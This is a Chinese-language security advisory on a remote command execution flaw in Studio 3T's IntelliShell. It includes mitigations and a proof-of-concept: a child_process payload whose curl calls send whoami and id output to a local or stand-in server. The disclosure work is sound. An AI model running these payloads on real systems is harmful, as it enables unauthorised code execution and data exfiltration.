
Studio 3T v.2025.1.0
软件: Studio 3T v.2025.1.0
漏洞报告: Studio 3T 远程命令执行
概述 Studio 3T 版本 2025.1.0 及更早版本中存在一个严重漏洞,允许远程攻击者通过利用 IntelliShell 组件中的 child_process 模块构造恶意载荷执行任意代码。
详情 漏洞类型: 远程命令执行 受影响产品: Studio 3T,版本 <= 2025.1.0 受影响组件: IntelliShell 攻击类型: 远程 影响: 代码执行: 是 拒绝服务: 是 权限提升: 是
描述 该漏洞使远程攻击者能够通过 IntelliShell 发送恶意 JavaScript 载荷,利用 child_process 模块执行任意操作系统命令。这是一个盲执行漏洞,意味着攻击者无法直接获得输出。 攻击向量
建立与 MongoDB 实例的连接。 通过 IntelliShell 发送恶意 JavaScript 载荷,利用 child_process 模块执行任意操作系统命令。
验证概念 要验证该漏洞,请执行以下步骤:
搭建本地 HTTP 服务器:python3 -m http.server 80
在 IntelliShell 中执行以下 JavaScript 载荷: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));
或者,使用以下命令作为验证向量:curl http://site/$(id) 参考
Studio 3T 官方网站
Studio 3T GitHub 仓库
CWE-78: OS 命令注入
CWE-94: 代码注入
缓解措施 用户: 升级到已修补的 Studio 3T 版本(如有),或避免对不受信任的 MongoDB 连接使用 IntelliShell。 供应商: 限制或清理 IntelliShell 中 child_process 模块的输入,以防止未授权命令执行。
致谢 该漏洞由 Kaio Mendonca Pereira 发现并报告。